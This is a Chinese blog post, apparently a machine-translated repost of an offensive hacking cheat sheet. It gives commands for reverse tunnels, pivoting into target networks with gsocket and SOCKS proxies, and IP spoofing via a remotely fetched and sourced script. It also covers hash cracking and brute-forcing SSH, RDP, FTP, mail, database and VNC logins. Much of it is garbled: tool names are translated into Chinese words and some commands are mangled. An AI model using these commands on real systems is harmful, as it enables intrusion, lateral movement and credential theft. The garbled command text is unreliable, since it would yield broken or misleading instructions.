高级黑客技术,高级黑客术语大全

高级黑客技术 ❝ 黑客在进行网络设置时,会采用一些技巧来提高匿名性、安全性和效率。以下是一些基本的网络设置技巧。 ❞ 3. 网络
3.1发现主机 #\\# ARP disocer computers on the local

黑客在建立网络时使用各种技巧来提高匿名性、安全性和效率。以下是一些基本的网络配置技巧。

3. 网络

3.1发现主机

#\\# 本地网络上的ARP 分发计算机

nmap -r -sn -PR 192.168.0.1/24

\\## ICMP 发现本地网络上的计算机

NET=\’10.11.0\’ \\# 检测10.11.0.1-10.11.0.254

序列1 254 | \’$7;}\’ | 排序-uV -k1,1

3.2 tcp转储

\\## 监控所有新的TCP 连接

tcpdump -np \’tcp\\[tcpflags\\]==tcp-syn\’\\## 在每个新的SSH 连接上播放\\*bing\\* 噪音

运行tcpdump -nplq \’tcp\\[13\\]==2 和dst 端口22\’ | echo \’${x}\’。

\\## ASCII 输出(对于所有大数据包;如果未使用TCP 选项,则更改为40)。

tcpdump -npAq -s0 \’tcp 和(ip\\[2:2\\] 60)\’

3.3隧道与转发

\\## 连接到SSL(使用socat)

socat stdio openssl\\-connect:smtp.gmail.com:465

\\## 连接到SSL(使用openssl)

openssl s\\_client \\-connect smtp.gmail.com:465

\\## 将TCP 桥接到SSL

socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465

3.3.1 原始TCP 反向端口

使用segfault.net[1](免费):

\\# 请求随机公共TCP 端口:

卡尔SF/港口

echo \’您的公共IP:PORT是$(cat /config/self/reverse\\_ip):$(cat /config/self/reverse\\_port)\’

nc -vnlp $(cat /config/self/reverse\\_port)

使用bore.pub[2](免费)。

\\# 将随机公共TCP 端口转发到localhost:31337

钻孔本地31337 –to bore.pub

使用serveo.net[3](免费):

\\# 将随机公共TCP 端口转发到localhost:31337

ssh -R 0:localhost:31337serveo.net

另请参阅remote.moe[4](免费)将原始TCP 从目标转发到工作站,或ngrok[5](付费订阅)以转发原始公共TCP 端口。

其他免费服务仅限于HTTPS(而非原始TCP)传输。以下是一些提示,展示如何通过HTTPS 传输原始TCP(使用Websockets)。

3.3.2 HTTPS反向隧道

在您的服务器上使用以下三种HTTPS 隧道服务之一:

\\### 使用反向HTTPS 隧道将公共HTTPS 请求转发到此服务器上的端口8080:

ssh -R80:0:8080 -o StrictHostKeyChecking=accept\\-new nokey@localhost.run

\\### 或使用remote.moe

ssh -R80:0:8080 -o StrictHostKeyChecking=accept\\-new nokey@remote.moe

\\### 或使用cloudflared

卷曲-fL -o cloudflare https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64

chmod 755 云flare

cloudflare 隧道–url http://localhost:8080 –no\\-autoupdate

这两个服务都会生成一个新的临时HTTPS URL 供您使用。

接下来,使用websocat[6] 或Gost 在两端的HTTPS URL 上建立原始TCP 隧道。 [7]

A. 通过HTTPS 的简单STDIN/STDOUT 管道:

\\### 在服务器上将WebSocket 转换为原始TCP:

websocat \\-s 8080

\\### 将stdin/stdout 转发到远程目标上的WebSocket:

websocat wss://HTTPS-URL

B. 通过HTTPS 传输原始TCP。

\\### 在服务器: 上,Gost 将任何HTTP-Websocket 请求转换为TCP Socks5 request:

gost -L mws: //:8080

将端口2222 转发到服务器上的端口22。

\\### 在工作站: 上

gost -L tcp://:2222/127.0.0.1:22 -F \’mwss://HTTPS-URL:443\’\\### 测试连接(连接到服务器上的localhost:22)

数控越南127.0.0.1 2222

或者,使用服务器作为Socks-Proxy EXIT 节点(例如,通过服务器访问服务器网络中的任何主机或访问Internet(使用上述HTTPS 反向隧道))。

\\### 在工作站: 上

gost -L :1080 -F \’mwss://HTTPS-URL:443\’\\### 测试socks-proxy:

卷曲-xocks5h://0 ipinfo.io

详细信息:https://github.com/twelvesec/port-forwarding 和通过Cloudflare[8] 和Awesome Tunneling[9] 到任何TCP 服务的隧道。

3.3.3 使用iptables 反弹流量

使用主机192.168.0.100作为跳转主机。将连接从任意位置转发到192.168.0.100:53,然后转发到1.2.3.4:443。

端口\\=53

DSTIP\\=1.2.3.4

D端口\\=443

echo 1 /proc/sys/net/ipv4/ip\\_forward

iptables -t mangle -C PREROUTING -j CONNMARK –restore-mark iptables -t mangle -I PREROUTING -j CONNMARK –restore-mark

iptables -t mangle -A PREROUTING -p tcp –dport ${FPORT:} -m addrtype –dst-type LOCAL -j MARK –set-mark 1188

iptables -t nat -I PREROUTING -p tcp -m mark –mark 1188 -j DNAT –to ${DSTIP:}:${DPORT:}

iptables -I 转发-m 标记–mark 1188 -j 接受

iptables -t nat -I 后路由-m mark –mark 1188 -j 伪装

iptables -t nat -I POSTROUTING -m mark –mark 1188 -j CONNMARK –save-mark

使用此技巧从防火墙网络深处访问gsocket-relay-network(或TOR)。

\\# 部署到只能到达192.168.0.100的目标

GS\\_HOST=192.168.0.100 GS\\_PORT=53 ./deploy.sh

\\#访问目标

GS\\_HOST=1.2.3.4: GS\\_PORT=443 gs-netcat -i -s .

3.3.4 Ghsot IP/IP 欺骗

对于目标网络中的主机很有用。该工具重新配置SHELL(不跟踪)。从该SHELL(nmap、cme等)启动的程序将使用假IP。所有攻击均来自不存在的主机。

来源(curl -fsSL https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh)

这也可以与以下方式结合使用:

段错误ROOT 服务器[10]

:将ROOT服务器连接到目标网络,并使用目标网络中的Ghost IP。

QEMU 隧道[11]

:与上面相同,但安全性较差。

3.4通过 Socks Proxy 使用任何工具

使用gsocket 创建从目标到工作站的隧道。

在目标网络上:

#\\# 在目标网络上创建SOCKS 代理。

#\\# 使用gs-netcat,但ssh -D 也可以工作。

gs-netcat -l -S

在工作站上:

#\\# 创建到目标network:的gsocket隧道

GS-netcat-p 1080

使用代理链。

\\## 使用ProxyChain访问目标网络:上的任意主机

echo -e \’\\[ProxyList\\]\\\\nsocks5 127.0.0.1 1080\’ pc.conf

proxychain -f pc.conf -qcurl ipinfo.io

\\## 扫描192.168.1.1 上的路由器

代理链-f pc.conf -q nmap -n -Pn -sV -F –open 192.168.1.1

\\## 并行启动10 个nmap:

seq 1 254 | xargs -P10 -I{} proxychain -f pc.conf -q nmap -n -Pn -sV -F –open 192.168.1.{}

使用GrafTCP:

\\## 使用graftcp访问目标网络:上的任意主机

(graftcp-local -select\\_proxy\\_mode only\\_socks5 )

嫁接cp 卷曲ipinfo.io

raftcp ssh root@192.168.1.1

raftcp nmap -n -Pn -sV -F –open 19.168.1.1

3.5 查找您的公共 IP 地址

卷曲-s wtfismyip.com/json |

卷曲ifconfig.me

dig +short myip.opendns.com @resolver1.opendns.com

主机myip.opendns.comsolver1.opendns.com

获取有关任何IP 地址的地理位置信息。

卡尔https://ipinfo.io/8.8.8.8 |

卷曲http://ip-api.com/8.8.8.8

卷曲https://cli.fyi/8.8.8.8

通过IP地址获取ASN信息。

asn() {

\\[\\[ -n $1 \\]\\] { echo -e \’begin\\\\nverbose\\\\n${1}\\\\nend\’|netcat whois.cymru.com 43| }

(echo -e \’begin\\\\nverbose\’;cat -;echo end)|netcat whois.cymru.com 43|tail -n +2

}

asn 1.1.1.1 \\# 单个IP查找

cat IPS.txt asn \\# 批量搜索

检查TOR 是否正常工作。

卷曲-x sock5h: //localhost:9050 -s https://check.torproject.org/api/ip

\\### 结果应该是{\’IsTor\’:true.

3.6检查世界各地的可达性

**https://ping.pe/** 的好心人可以运行ping/traceroute/mtr/dig/port 来检查世界各地的主机,检查TCP 端口,解析域名等。Masu。

要检查(当前)主机的互联网连接,请使用OONI 探针[12]。

奥尼探测器运行我

网站由ooniprobe运营

奥尼探针列表

奥尼探针列表1

3.7检查/扫描 IP 上的开放端口

**Censys[13] 或Shodan[14]** 端口查找服务:

卷曲https://internetdb.shodan.io/1.1.1.1

快速(-F)漏洞扫描

\\# 收集版本

nmap \\-sCV \\-F \\-Pn \\–min\\-rate 10000 scanme.nmap.org

\\# 气球

nmap \\-A \\-F \\-Pn \\–min\\-rate 10000 \\–script vulners.nse \\–script\\-timeout\\=5s scanme.nmap.org

使用bash:

超时5 bash -c \’/dev/tcp/1.2.3.4/31337\’ echo 打开|| echo 关闭

3.8破解密码哈希

NTLM2 密码[15]

破解NTLM 密码(搜索)

wpa-sec[16]

破解WPA PSK 密码(搜索)

HashCat 对于其他用途来说也是一个可靠的工具。

hashcat my\\-hash /usr/share/wordlists/rockyou.txt

或者在GPU 上使用10 天的7-16 字符哈希掩码:[17]

卷曲-fsSL https://github.com/sean-t-smith/Extreme\\_Breach\\_Masks/raw/main/10%2010-days/10-days\\_7-16.hcmask -o 10-days\\_7-16.hcmask

\\# -d2==仅使用GPU #2(设备#2)

\\# -O==速度提高50%,但密码长度限制为=15

\\# -w1==低工作负载(-w3==高)

好-n 19 hashcat -o crashed.txt my-hash.txt -w1 -a3 10天\\_7-16.hcmask -O -d2

请阅读常见问题解答[18]。

6 6 6 请注意,散列速度很慢。即使是7 到16 个字符的1 分钟哈希掩码[19] 在8xRTX4090 集群上也需要很多天才能完成。

使用Vast.ai[20] 租用GPU 集群并使用dizcza/docker-hashcat[21](详细信息请参阅[22])。

否则,请使用Crackstation[23]、shuck.sh[24]、ColabCat/cloud[25]/**Cloudtopolis[26],或破解您自己的AWS[27]** 实例。

用户名和密码列表:

/usr/share/nmap/nselib/data

/usr/share/wordlists/seclists/密码

https://github.com/berzerk0/Probable-Wordlists

-THC 收藏夹

https://github.com/danielmiessler/SecLists

https://wordlists.assetnote.io

https://weakpass.com

https://crackstation.net/

配置用户名/密码列表和目标主机。

ULIST=\’/usr/share/wordlists/brutespray/mysql/user\’

PLIST=\’/usr/share/wordlists/seclists/Passwords/500-worst-passwords.txt\’

T=\’192.168.0.1\’

有用的Nmap 参数:

\\–script-args userdb=\’${ULIST}\’,passdb=\’${PLIST}\’,brute.firstOnly

有用的Ncrack 参数:

\\-U \’${ULIST}\’

\\-P \’${PLIST}\’

有用的Hydra 参数:

\\-t4 \\# 限制为4 个任务

\\-l root \\# 设置用户名

\\-V \\# 显示每次登录/密码尝试

\\-s 31337 \\# 设置端口

\\-S \\# 使用SSL

\\-f \\# 第一次有效登录后退出

## SSH

nmap -p 22 –script ssh-brute –script-args ssh-brute.timeout=4s \” T \’ n c r a c k P \’ T\’ ncrack -P \’ T\’ncrackP\'{PLIST}\” –user root \” ssh://T \’ Hydra P \’ {T}\’ Hydra -P \’ T\’ Hydra P\'{PLIST}\” -l root “ssh://$T”

\\## 远程桌面协议/RDP

ncrack -P \’${PLIST}\’ –用户root -p3389 \’${T}\’

Hydra -P \’${PLIST}\’ -l root \’rdp://$T\’

\\## FTP

Hydra -P \’${PLIST}\’ -l 用户\’ftp://$T\’

## IMAP(电子邮件)

nmap -p 143,993 –script imap-brute“$T”

\\## POP3(电子邮件)

nmap -p110,995 –script Pop3-brute \’$T\’

\\##MySQL

nmap -p3306 –script mysql-brute \’$T\’

\\## PostgreSQL

nmap -p5432 –script pgsql-brute \’$T\’

\\## SMB(Windows)

nmap –script smb-brute \’$T\’

\\## 远程登录

nmap -p23 –script telnet-brute –script-args telnet-brute.timeout=8s \’$T\’

\\## VNC

nmap -p5900 –script vnc-brute \’$T\’

ncrack -P \’${PLIST}\’ –用户root \’vnc://$T\’

Hydra -P \’${PLIST}\’ \’vnc://$T\’

美杜莎-P \’${PLIST}\’ -u root -M vnc -h \’$T\’

\\## VNC(使用metasploit)

无国界医生控制台

使用辅助/扫描仪/vnc/vnc\\_login

设置rhosts 192.168.0.1

设置pass\\_file /usr/share/wordlists/seclists/Passwords/500\\-worst\\-passwords.txt

跑步

\\## HTML 基本身份验证

echo admin user.txt \\# 请仅尝试一个用户名

echo -e \’blah\\\\naaddd\\\\nfoobar\’ pass.txt \\# 添加一些密码。 “aadd”有效。

nmap -p80 –script http-brute –script-args \\\\

http-brute.hostname=pentesteracademylab.appspot.com,http-brute.path=/lab/webapp/basicauth,userdb=user.txt,passdb=pass.txt,http-brute.method=POST,brute.firstOnly \\\\

Penteterra 学院mylab.appspot.com

免责声明

本文为技术分享文章,仅供教育交流之用,不构成法律或专业建议。读者使用本文需自行承担风险和责任。作者和组织对因使用本文而产生的任何损失或损害不承担任何责任。

本文严格禁止提供、讨论或鼓励网络安全违规行为。请遵守法律法规,从事合法的技术共享活动。

网安黑客学习资料包

根据最新的Kali描述,一步步分析黑客攻击和防御。适合各个级别的粉丝。如果我们能够提供实际的帮助,让您能够通过新鲜生动、易于理解且幽默的解释轻松享受学习的乐趣。

学习资料工具包

盒底丰富资源,全面深入介绍网络安全基础理论,包括逆向工程、八层网络防御、汇编语言、白帽网络安全、密码学、网络安全协议、等等。基础理论与主流工具的应用实践。帮助读者了解各种主流工具背后的实现机制。

面试题资料

我们的专用频道收集了京东、360、天融信等公司的试题。大工厂的入口就在拐角处!

由于篇幅有限,仅展示部分信息。如果您需要,可以扫描下面的卡片获取。

以上关于#高级黑客技术的相关内容摘自互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92845.html

Like (0)
CSDN的头像CSDN
Previous 2024年7月4日
Next 2024年7月4日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注